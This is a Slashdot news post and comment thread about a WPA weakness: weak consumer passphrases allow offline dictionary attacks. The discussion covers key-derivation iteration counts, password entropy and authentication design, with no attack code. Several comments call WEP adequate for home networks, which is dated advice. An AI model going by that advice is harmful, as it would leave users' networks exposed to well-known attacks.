New Wireless Security Standard Has Old Problem? 249
eggboard writes "Wireless security expert Robert Moskowitz, who sits on IEEE and IETF committees on that subject, sent me a short paper on a glaring weakness in the Wi-Fi Protected Access (WPA) protocol that's replacing the weak and broken WEP system well discussed here at Slashdot. His paper, which I've posted here, proves definitively that while WPA itself remains robust and secure, the interface for choosing consumer passwords makes it simple to snarf a tiny bit of network traffic and perform an offline dictionary attack. For Slashdot readers, this probably seems trivial, but because Linksys, Apple, and others are letting users enter My Dog Has Fleas as their passphrase, WPA might be less secure for home users than WEP."
Big deal (Score:5, Informative)
Only long passwords and encouraging the users to use good quality passwords/phrases really helps.
Ultimately though, these passphrases are flawed anyway- they are a form of shared password. History has shown this to be a thoroughly bad idea, one passphrase per user/machine is a far better idea; and even the user shouldn't know what it is (that way it can't get beaten out of them- black cosh crytography works pretty darn well.) These standards organisations aren't even trying.
Mirror (Score:1, Informative)
This is *Supposed* to be hard (Score:5, Informative)
Thus when you perform your offline dictionary attack, for each lookup in the dictionary, you must perform 4096 HMAC_SHA1s and this might take some time if you are looking up a large number of dictionary entries.
The basic conflict is the wide disparity between the power of processors in low end 802.11 transceivers and high end computers. The time to compute the 4096 HMAC-SHA1s is significant on say a slow ARM7TDMI and the 4096 value is a compromise to limit the delay in computing this. This delay affects the time from pressing return on the keyboard, to the time the PTK can be known and communications can begin.
However the attacker can apply his cluster of 3GHz PCs, or his FPGA HMAC_SHA1 parallel processor, or his supercomputer array, and make the speed of dictionary lookups relatively insignificant compared against the strength of the passwords being used.
The wise people asked for a much higher number than 4096. Some implementation types beat it down to 4096, and here we are..
Re:WEP newbie question - how bad is it? (Score:3, Informative)
And yes, this is from experience. I will neither confirm nor deny that I was given permission to try this...
Re:WEP newbie question - how bad is it? (Score:5, Informative)
Ars Technica has a good summary of what you can do with SSID's and WEP to improve your wireless network's security:-
Security Practicum: Essential Home Wireless Security Practices [arstechnica.com]Re:WEP newbie question - how bad is it? (Score:4, Informative)
Just enable the WEP, use secure applications for sensitive data, and quit worrying about it.
Re:WEP newbie question - how bad is it? (Score:3, Informative)
Now, if a bank or hospital was going to install a wireless wep on a campus with account passwords etc in the air in the parking lot, then you'd have good reason to worry.
Re:My Dog Has Fleas (Score:5, Informative)
The only pratical way to find that password is through brute force. In this scenario, the longer the password and more possible different characters (ie lowercase and uppercase, and spaces) makes it more difficult. Thus, 'My Dog has Fleas' would be more secure than 'mdhfaymdt' against a brute force attack. The latter could be broken in a matter of hours through brute force.
Re:one for the crypto/math freaks (Score:3, Informative)
Cryptography is not for the math-impared (Score:2, Informative)
assuming there are about 10K words in common vocabulary, and you use 10 words, that's about 10,000^10. pretty large, but only about 23 bits.
10,000^10 ~ (2^13.3)^10 = 2^133 = 133 bits of encryption.
but your 20 character password has a huge entropy. you have 26 lowercase letters, 26 uppercase letters, 10 numbers and about 10 punctuation marks. that's 66 possibilities per character. now 72^20 is a lot. that's about 26 bits.
66 possibilities * 20 chars ~ (2^6)^20 = 2^120 = 120 bits of encryption.
Re:At least use WEP! (Score:5, Informative)
Instead, we've segregated all of the WAPs onto a dead-end network where the users have to VPN into our LAN through a border server. (Basically treating them as if they were outside the office and coming in from an external ISP.)
Works pretty well, other then having to remember to VPN into the network. The traffic ends up encrypted (inside of the VPN tunnel), so it's not possible to sniff passwords.
Re:Cryptography is not for the math-impared (Score:4, Informative)
Re:WEP newbie question - how bad is it? (Score:2, Informative)
WEP isn't that bad to begin with (Score:4, Informative)
Home users are going to generate less traffic than businesses, and so it will take even longer to get enough traffic. Unless you happen to notice a van parked outside your house for a couple days, or find yourself staring down the barrel of a pringles can, you can relax.
Re:Kerberos (Score:2, Informative)
* there are some known systems that use passwords but which are not susceptible to this attack, invoving a carefully bound combination of passwords and a Diffie-Hellman exchange. I don't have a reference to hand, but such a system exists. Kerberos isn't it, though.
Krill
Re:one for the crypto/math freaks (Score:2, Informative)
When possible, it is nice to find an algorithm or a protocol that allows two parties to authenticate without actually revealing enough information to identify the key.
The lowest level of security would be where everything is out in the open for any observer -- they still have to observe, but one observation is all that is needed. For example, if you hand somebody your credit card, they have all of the information necessary to use it to steal from you -- it is all there on the card, perfectly legible. As another example, if you walk up to a terminal and type your password, anybody with camera pointed at the keyboard or some kind of electronic keylogger will be able to record your name and password on the wire, and then they know everything they need to know to take over your account.
Things are slightly more secure when some additional work is required after getting the information. The old-school UNIX passwd file with encrypted passwords out in the open was like this -- anybody could copy the passwd file, but they would then have to run a cracker on it for a few weeks or months before anything useful showed up. Now that computers are faster and security is more of an issue, the passwd file is shadowed so that the passwd file doesn't actually have the encrypted passwords, which is a good thing because the original crypt algorithm can now be cracked pretty easily. Thus exploit is similar -- you can watch a session initiation, and with only that info, you can crack the password.
Re:one for the crypto/math freaks (Score:2, Informative)
There is a third category of transaction security, where even after observing the entire transaction, an eavesdropper doesn't have enough information to impersonate you. Generally, this takes the form of challenge-response. The server asks "42365?" and you answer "92581!" which is the correct answer. But an observer still doesn't know how to impersonate you, because next time, the server will ask "98765?" and the observer doesn't know that the answer is "45678!". Smart cards are like this, which is why they are more secure than credit cards or passwords.
Each of these three categories still have varying degrees of security.
In the first case, it is easy to use the information from a stolen credit card, but it would be pretty hard to make use of the information from a retinal scan. In both cases, you have all the information, but it's quite a pain to get your eyes replaced (if you get hungry, there's a sandwich and some milk in the fridge...).
In the second case, while reversing a crypt password isn't too tough anymore, it still takes a bit of work to reverse engineer a 1024-bit RSA key. In both cases, the information is out in the clear, but factoring a 1024-bit number is a lot more work than running the crypt algorithm a few billion times.
In the third case, "Mary had a what?" --> "Little lamb!" is easier than a smart card transaction.
While we would love to have a cryptographically strong variation on the third case for every possible authentication/encryption transaction, it just isn't practical. In the case of WEP/WAP/Whatever, there are a lot of limitations to work around. It has to work on cheap hardware, it has to be fast enough to handle the traffic, it has to work in the face of many dropped packets, it can't inconvenience the user too much, etc.
While I can think of a few things that I might have done differently, it seems like the new protocol is decent, given the limitations they were facing. While I wouldn't want to trust top-secret information to it, it seems that it is good enough for the average Joe.